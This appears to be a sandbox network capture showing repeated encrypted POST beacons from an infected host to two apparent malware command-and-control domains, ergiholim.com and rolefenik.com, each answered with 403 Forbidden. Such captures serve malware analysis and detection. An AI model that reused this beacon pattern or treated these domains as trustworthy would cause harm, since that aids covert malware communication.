                                                                                                                                          2024-11-13 17:23:06 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          60192.168.2.650054104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:07 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:07 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:08 UTC744INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:08 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtKpxvxrnx3yBfmjwSLQcAOLxc520cXHDYngWBt5NM8LaldTRbJXWrV5v1aRMWaaSCtHfBaAzZuSm96b9RnA3aJAfsNAANF1wMeBmdJHB5oxnbKRrI%2BUYWPnjNwYfPet"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072a68da0d788-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137469&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=21056&cwnd=32&unsent_bytes=0&cid=d54b3113894ee5f0&ts=550&x=0"
                                                                                                                                          2024-11-13 17:23:08 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          61192.168.2.650055104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:09 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:09 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:09 UTC745INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:09 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=acQqXazriKixtSRErgKXYHINiJgj84YMNHGkGFYHNJungNXei4EnEFzpSwIR6R9bTvyCoqoNNLXd6yE5eyqtlX%2FZLhwz0vrnKs%2Fu4ktygz8gWlbcfdc03yaxksnNVAqU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072adfc01c9ad-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=34535&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=83883&cwnd=32&unsent_bytes=0&cid=32c78d7787abab5b&ts=276&x=0"
                                                                                                                                          2024-11-13 17:23:09 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          62192.168.2.650056104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:10 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:10 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:10 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:10 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2FKxvvLq0z1pnKTbamai0hYAGNMx2URWKEW5LmRezYKImECxHMNyTXb%2BB7J5%2FwFx7Z%2BvzLkSNPhL6hdfM1xfIx32dWXoe8fUu%2B6vaIdT5yxgT0LifnIojDNCJ6TWAVG1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072b5dff8aff3-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=144356&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=17493&cwnd=32&unsent_bytes=0&cid=bfb7b3b6bc45a5b3&ts=626&x=0"
                                                                                                                                          2024-11-13 17:23:10 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          63192.168.2.650057104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:11 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:11 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:11 UTC755INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:11 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cSCNW9txY29WhwKOJ0uSgGvWJ82zsiHsaSjWWDbeypUyYa2%2BiH70zzO%2F5AepQLci1s0SefYitC1PmzpjdhZ%2FpGeI7FuZYk8nPMmyYjOlEAgA57hRE%2Fy1G5%2FJGW%2FpXiQa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072bd1d646c80-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1962&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1483606&cwnd=251&unsent_bytes=0&cid=06bcf1c192d78d40&ts=406&x=0"
                                                                                                                                          2024-11-13 17:23:11 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          64192.168.2.650058104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:12 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:12 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:13 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:13 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Io%2BxfrBrKy5I6J13uaLBQm%2BZUKBKUvKw6vD9nuvhChW5CL5yklHSuzH9yp9TFAK6jlgSxabaGu8UqoVDwuEwkkHDA%2B1F52oPI3aGtto9EcywPZVHn1us0KwRNRRBf5sL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072c58a6ce387-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=141013&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20577&cwnd=32&unsent_bytes=0&cid=d270895326dc000b&ts=818&x=0"
                                                                                                                                          2024-11-13 17:23:13 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          65192.168.2.650059104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:14 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:14 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:15 UTC756INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:15 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vwx71jEP%2Bnq%2BzAbVTEnchr4c5SrwZxAw8ImT1K%2F2YBZIPGr5DO%2BfForNYG%2BwHrqfLEgJJXsuWuBO%2FSZMeFXbuAUXzGXXIeuVQhZXe%2BrGq2rsJ2idB0eaTQrz058HNyCo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072d1bb3bd79c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=141215&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=20516&cwnd=32&unsent_bytes=0&cid=65f56815b85c26a3&ts=708&x=0"
                                                                                                                                          2024-11-13 17:23:15 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          66192.168.2.650061104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:16 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
